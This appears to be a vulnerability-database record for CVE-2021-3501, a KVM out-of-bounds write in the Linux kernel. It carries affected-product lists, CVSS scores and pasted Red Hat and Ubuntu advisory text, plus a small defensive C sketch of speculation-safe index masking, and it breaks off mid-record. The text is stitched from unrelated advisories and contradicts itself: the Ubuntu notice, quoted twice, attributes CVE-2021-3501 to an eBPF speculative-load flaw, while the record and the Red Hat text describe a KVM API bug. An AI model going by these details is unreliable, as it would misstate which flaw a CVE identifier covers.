Source: redhat-release-virtualization-host-4.4.6-2.el8ev.src.rpm
noarch: redhat-virtualization-host-image-update-placeholder-4.4.6-2.el8ev.noarch.rpm
x86_64: redhat-release-virtualization-host-4.4.6-2.el8ev.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-24489
https://access.redhat.com/security/cve/CVE-2021-3501
https://access.redhat.com/security/cve/CVE-2021-3560
https://access.redhat.com/security/cve/CVE-2021-27219
https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
- kernel-rt: update RT source tree to the RHEL-8.4.z0 source tree (BZ#1957489)
- Description:
This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. 8) - aarch64, noarch, ppc64le, s390x, x86_64
Bug Fix(es):
- OVS mistakenly using local IP as tun_dst for VXLAN packets (?) (BZ#1944667)
- Selinux: The task calling security_set_bools() deadlocks with itself when it later calls selinux_audit_rule_match(). (BZ#1945123)
- [mlx5] tc flower mpls match options does not work (BZ#1952061)
- mlx5: missing patches for ct.rel (BZ#1952062)
- CT HWOL: with OVN/OVS, intermittently, load balancer hairpin TCP packets get dropped for seconds in a row (BZ#1952065)
- [Lenovo 8.3 bug] Blackscreen after clicking on "Settings" icon from top-right corner. (BZ#1952900)
- RHEL 8.x missing uio upstream fix. (BZ#1952952)
- Turbostat doesn't show any measured data on AMD Milan (BZ#1952987)
- P620 no sound from front headset jack (BZ#1954545)
- RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. (BZ#1955188)
- [net/sched] connection failed with DNAT + SNAT by tc action ct (BZ#1956458)
==========================================================================
Ubuntu Security Notice USN-4983-1
June 03, 2021
linux-oem-5.10 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
Summary:
Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)
Piotr Krysiuk and Benedict Schlueter discovered that the eBPF implementation in the Linux kernel performed out of bounds speculation on pointer arithmetic. A local attacker could use this to expose sensitive information. (CVE-2021-29155)
Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3501)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS:
  linux-image-5.10.0-1029-oem  5.10.0-1029.30
  linux-image-oem-20.04        5.10.0.1029.30
  linux-image-oem-20.04b       5.10.0.1029.30
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
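The eBPF speculation issues in this notice (CVE-2021-29155 and related) are typically mitigated with branch-free index masking, so a mispredicted bounds check cannot steer a speculated load out of bounds. The sketch below shows the general idiom, conceptually similar to the kernel's array_index_nospec helper; the function names here are illustrative, not the kernel API.

```c
#include <assert.h>
#include <stddef.h>

/* All-ones mask when idx < size, all-zeroes otherwise. Computed with
 * arithmetic rather than a branch, so there is no conditional jump for
 * the CPU to mispredict and speculate past. */
size_t index_mask(size_t idx, size_t size)
{
    return (size_t)0 - (size_t)(idx < size);
}

/* Clamp an index so that even under (mis)speculation the result stays
 * within [0, size): out-of-range indices are forced to 0. */
size_t index_nospec(size_t idx, size_t size)
{
    return idx & index_mask(idx, size);
}
```

Callers then use the clamped value for the array access; in-range indices pass through unchanged, while any out-of-range value collapses to 0 instead of reaching attacker-chosen memory.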
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "virtualization host",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
}
],
"trust": 0.6
},
"cve": "CVE-2021-3501",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2021-3501",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-391161",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2021-3501",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.1,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-3501",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-3501",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-3501",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-271",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-391161",
"trust": 0.1,
"value": "LOW"
},
{
"author": "VULMON",
"id": "CVE-2021-3501",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"description": {
"_id": null,
"data": "A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index, which can be updated by a user process at anytime which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability. Linux Kernel Is vulnerable to an out-of-bounds write.Information is tampered with and denial of service (DoS) It may be put into a state. KVM is one of the kernel-based virtual machines. This vulnerability could result in an out-of-bounds write. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.4 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability\nengineers face as they work across a range of public and private cloud\nenvironments. \nClusters and applications are all visible and managed from a single\nconsole\u2014with security policy built in. 
See\nthe following Release Notes documentation, which will be updated shortly\nfor\nthis release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.2/html/release_notes/\n\nSecurity fixes:\n\n* redisgraph-tls: redis: integer overflow when configurable limit for\nmaximum supported bulk input size is too big on 32-bit platforms\n(CVE-2021-21309)\n\n* console-header-container: nodejs-netmask: improper input validation of\noctal input data (CVE-2021-28092)\n\n* console-container: nodejs-is-svg: ReDoS via malicious string\n(CVE-2021-28918)\n\nBug fixes: \n\n* RHACM 2.2.4 images (BZ# 1957254)\n\n* Enabling observability for OpenShift Container Storage with RHACM 2.2 on\nOCP 4.7 (BZ#1950832)\n\n* ACM Operator should support using the default route TLS (BZ# 1955270)\n\n* The scrolling bar for search filter does not work properly (BZ# 1956852)\n\n* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)\n\n* The proxy setup in install-config.yaml is not worked when IPI installing\nwith RHACM (BZ# 1960181)\n\n* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)\n\n* Observability Thanos store shard crashing - cannot unmarshall DNS message\n(BZ# 1967890)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7\n1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory\n1954506 - [DDF] Table does not contain data about 20 clusters. 
Now it\u0027s difficult to estimate CPU usage with larger clusters\n1954535 - Reinstall Submariner - No endpoints found on one cluster\n1955270 - ACM Operator should support using the default route TLS\n1956852 - The scrolling bar for search filter does not work properly\n1957254 - RHACM 2.2.4 images\n1959426 - Limits on Length of MultiClusterObservability Resource Name\n1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. \n1963128 - [DDF] Please rename this to \"Amazon Elastic Kubernetes Service\"\n1966513 - Unable to make SSH connection to a Bitbucket server\n1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. \n1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message\n\n5. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.16. See the following advisories for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2287\n\nSpace precludes documenting all of the container images in this advisory. \n\nAdditional Changes:\n\nThis update also fixes several bugs. Documentation for these changes is\navailable from the Release Notes document linked to in the References\nsection. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1889659 - [Assisted-4.6] [cluster validation] Number of hosts validation is not enforced when Automatic role assigned\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1932638 - Removing ssh keys MC does not remove the key from authorized_keys\n1934180 - vsphere-problem-detector should check if datastore is part of datastore cluster\n1937396 - when kuryr quotas are unlimited, we should not sent alerts\n1939014 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP\n1939553 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string\n1940275 - [IPI Baremetal] Revert Sending full ignition to masters\n1942603 - [4.7z] Network policies in ovn-kubernetes don\u0027t support external traffic from router when the endpoint publishing strategy is HostNetwork\n1944046 - Warn users when using an unsupported browser such as IE\n1944575 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results\n1945702 - Operator dependency not consistently chosen from default channel\n1946682 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall\n1947091 - Incorrect skipped status for conditional tasks in the pipeline run\n1947427 - Bootstrap ignition shim doesn\u0027t follow proxy settings\n1948398 - [oVirt] remove ovirt_cafile from ovirt-credentials secret\n1949541 - Kuryr-Controller crashes when it\u0027s missing the status object\n1950290 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation\n1951210 - Pod log filename no longer in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1953475 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc\n1954121 - [ceo] [release-4.7] Operator goes degraded when a second internal node ip is added after 
install\n1955210 - OCP 4.6 Build fails when filename contains an umlaut\n1955418 - 4.8 -\u003e 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator\n1955482 - [4.7] Drop high-cardinality metrics from kube-state-metrics which aren\u0027t used\n1955600 - e2e unidling test flakes in CI\n1956565 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry\n1956980 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. \n1957308 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-\u003e Removed-\u003e Managed in configs.imageregistry with high ratio\n1957499 - OperatorHub - console accepts any value for \"Infrastructure features\" annotation\n1958416 - openshift-oauth-apiserver apiserver pod crashloopbackoffs\n1958467 - [4.7] Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct\n1958873 - Device Replacemet UI, The status of the disk is \"replacement ready\" before I clicked on \"start replacement\"\n1959546 - [4.7] storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions\n1959737 - Unable to assign nodes for EgressIP even if the egress-assignable label is set\n1960093 - Console not works well against a proxy in front of openshift clusters\n1960111 - Port 8080 of oVirt CSI driver is causing collisions with other services\n1960542 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960544 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console\n1960562 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960589 - manifests: extra \"spec.version\" in console quickstarts makes CVO hotloop\n1960645 - [Backport 4.7] Add virt_platform metric to the collected metrics\n1960686 - GlobalConfigPage is constantly requesting resources\n1961069 - CMO end-to-end tests work only on AWS\n1961367 - Conformance tests for OpenStack 
require the Cinder client that is not included in the \"tests\" image\n1961518 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1961557 - [release-4.7] respect the shutdown-delay-duration from OpenShiftAPIServerConfig\n1961719 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop\n1961887 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns\n1962314 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true\n1962493 - Kebab menu of taskrun contains Edit options which should not be present\n1962637 - Nodes tainted after configuring additional host iface\n1962819 - OCP v4.7 installation with OVN-Kubernetes fails with error \"egress bandwidth restriction -1 is not equals\"\n1962949 - e2e-metal-ipi and related jobs fail to bootstrap due to multipe VIP\u0027s\n1963141 - packageserver clusteroperator Available condition set to false on any Deployment spec change\n1963243 - HAproxy pod logs showing error \"another server named \u0027pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080\u0027 was already defined at line 326, please use distinct names\"\n1964322 - UI, The status of \"Used Capacity Breakdown [Pods]\" is \"Not available\"\n1964568 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation\n1965075 - [4.7z] After upgrade from 4.5.16 to 4.6.17, customer\u0027s application is seeing re-transmits\n1965932 - [oauth-server] bump k8s.io/apiserver to 1.20.3\n1966358 - Build failure on s390x\n1966798 - [tests] Release 4.7 broken due to the usage of wrong OCS version\n1966810 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration\n1967328 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud\n1967966 - prometheus-k8s pods can\u0027t be scheduled due to volume node affinity conflict\n1967972 - [calico] rbac-proxy container in kube-proxy fails to 
create tokenreviews\n1970322 - [OVN]EgressFirewall doesn\u0027t work well as expected\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat Virtualization Host security update [ovirt-4.4.6]\nAdvisory ID: RHSA-2021:2522-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:2522\nIssue date: 2021-06-22\nCVE Names: CVE-2020-24489 CVE-2021-3501 CVE-2021-3560 \n CVE-2021-27219 \n=====================================================================\n\n1. Summary:\n\nAn update for imgbased, redhat-release-virtualization-host, and\nredhat-virtualization-host is now available for Red Hat Virtualization 4\nfor Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64\nRed Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64\n\n3. Description:\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. 
Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a\nspecial build of Red Hat Enterprise Linux with only the packages required\nto host virtual machines. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nSecurity Fix(es):\n\n* glib: integer overflow in g_bytes_new function on 64-bit platforms due to\nan implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n* kernel: userspace applications can misuse the KVM API to cause a write of\n16 bytes at an offset up to 32 GB from vcpu-\u003erun (CVE-2021-3501)\n\n* polkit: local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* hw: vt-d related privilege escalation (CVE-2020-24489)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* Previously, systemtap dependencies were not included in the RHV-H\nchannel. Therefore, systemtap could not be installed. \nIn this release, the systemtap dependencies have been included in the\nchannel, resolving the issue. (BZ#1903997)\n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1903997 - Provide systemtap dependencies within RHV-H channel\n1929858 - CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits\n1950136 - CVE-2021-3501 kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu-\u003erun\n1961710 - CVE-2021-3560 polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync()\n1962650 - CVE-2020-24489 hw: vt-d related privilege escalation\n\n6. Package List:\n\nRed Hat Virtualization 4 Hypervisor for RHEL 8:\n\nSource:\nredhat-virtualization-host-4.4.6-20210615.0.el8_4.src.rpm\n\nx86_64:\nredhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4.x86_64.rpm\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements):\n\nSource:\nredhat-release-virtualization-host-4.4.6-2.el8ev.src.rpm\n\nnoarch:\nredhat-virtualization-host-image-update-placeholder-4.4.6-2.el8ev.noarch.rpm\n\nx86_64:\nredhat-release-virtualization-host-4.4.6-2.el8ev.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-24489\nhttps://access.redhat.com/security/cve/CVE-2021-3501\nhttps://access.redhat.com/security/cve/CVE-2021-3560\nhttps://access.redhat.com/security/cve/CVE-2021-27219\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYNH6EtzjgjWX9erEAQg8rBAApw3Jn/EPQosAw8RDA053A4aCxO2gHC15\nHK1kJ2gSn73kahmvvl3ZAFQW3Wa/OKZRFnbOKZPcJvKeVKnmeHdjmX6V/wNC/bAO\ni2bc69+GYd+mj3+ngKmTyFFVSsgDWCfFv6lwMl74d0dXYauCfMTiMD/K/06zaQ3b\narTdExk9VynIcr19ggOfhGWAe5qX8ZXfPHwRAmDBNZCUjzWm+c+O+gQQiy/wWzMB\n6vbtEqKeXfT1XgxjdQO5xfQ4Fvd8ssKXwOjdymCsEoejplVFmO3reBrl+y95P3p9\nBCKR6/cWKzhaAXfS8jOlZJvxA0TyxK5+HOP8pGWGfxBixXVbaFR4E/+rnA1E04jp\nlGXvby0yq1Q3u4/dYKPn7oai1H7b7TOaCKrmTMy3Nwd5mKiT+CqYk2Va0r2+Cy/2\njH6CeaSKJIBFviUalmc7ZbdPR1zfa1LEujaYp8aCez8pNF0Mopf5ThlCwlZdEdxG\naTK1VPajNj2i8oveRPgNAzIu7tMh5Cibyo92nkfjhV9ube7WLg4fBKbX/ZfCBS9y\nosA4oRWUFbJYnHK6Fbr1X3mIYIq0s2y0MO2QZWj8hvzMT+BcQy5byreU4Y6o8ikl\nhXz6yl7Cu6X7wm32QZNZMWbUwJfksJRBR+dfkhDcGV0/zQpMZpwHDXs06kal9vsY\nDRQj4fNuEQo=\n=bDgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z0 source tree\n(BZ#1957489)\n\n4. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* OVS mistakenly using local IP as tun_dst for VXLAN packets (?)\n(BZ#1944667)\n\n* Selinux: The task calling security_set_bools() deadlocks with itself when\nit later calls selinux_audit_rule_match(). 
(BZ#1945123)\n\n* [mlx5] tc flower mpls match options does not work (BZ#1952061)\n\n* mlx5: missing patches for ct.rel (BZ#1952062)\n\n* CT HWOL: with OVN/OVS, intermittently, load balancer hairpin TCP packets\nget dropped for seconds in a row (BZ#1952065)\n\n* [Lenovo 8.3 bug] Blackscreen after clicking on \"Settings\" icon from\ntop-right corner. (BZ#1952900)\n\n* RHEL 8.x missing uio upstream fix. (BZ#1952952)\n\n* Turbostat doesn\u0027t show any measured data on AMD Milan (BZ#1952987)\n\n* P620 no sound from front headset jack (BZ#1954545)\n\n* RHEL kernel 8.2 and higher are affected by data corruption bug in raid1\narrays using bitmaps. (BZ#1955188)\n\n* [net/sched] connection failed with DNAT + SNAT by tc action ct\n(BZ#1956458)\n\n4. ==========================================================================\nUbuntu Security Notice USN-4983-1\nJune 03, 2021\n\nlinux-oem-5.10 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nPiotr Krysiuk and Benedict Schlueter discovered that the eBPF\nimplementation in the Linux kernel performed out of bounds speculation on\npointer arithmetic. A local attacker could use this to expose sensitive\ninformation. (CVE-2021-29155)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. 
(CVE-2021-3501)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.10.0-1029-oem 5.10.0-1029.30\n linux-image-oem-20.04 5.10.0.1029.30\n linux-image-oem-20.04b 5.10.0.1029.30\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3501"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
},
{
"db": "PACKETSTORM",
"id": "162977"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-3501",
"trust": 4.1
},
{
"db": "PACKETSTORM",
"id": "162977",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "163149",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162881",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162936",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.1945",
"trust": 0.6
},
{
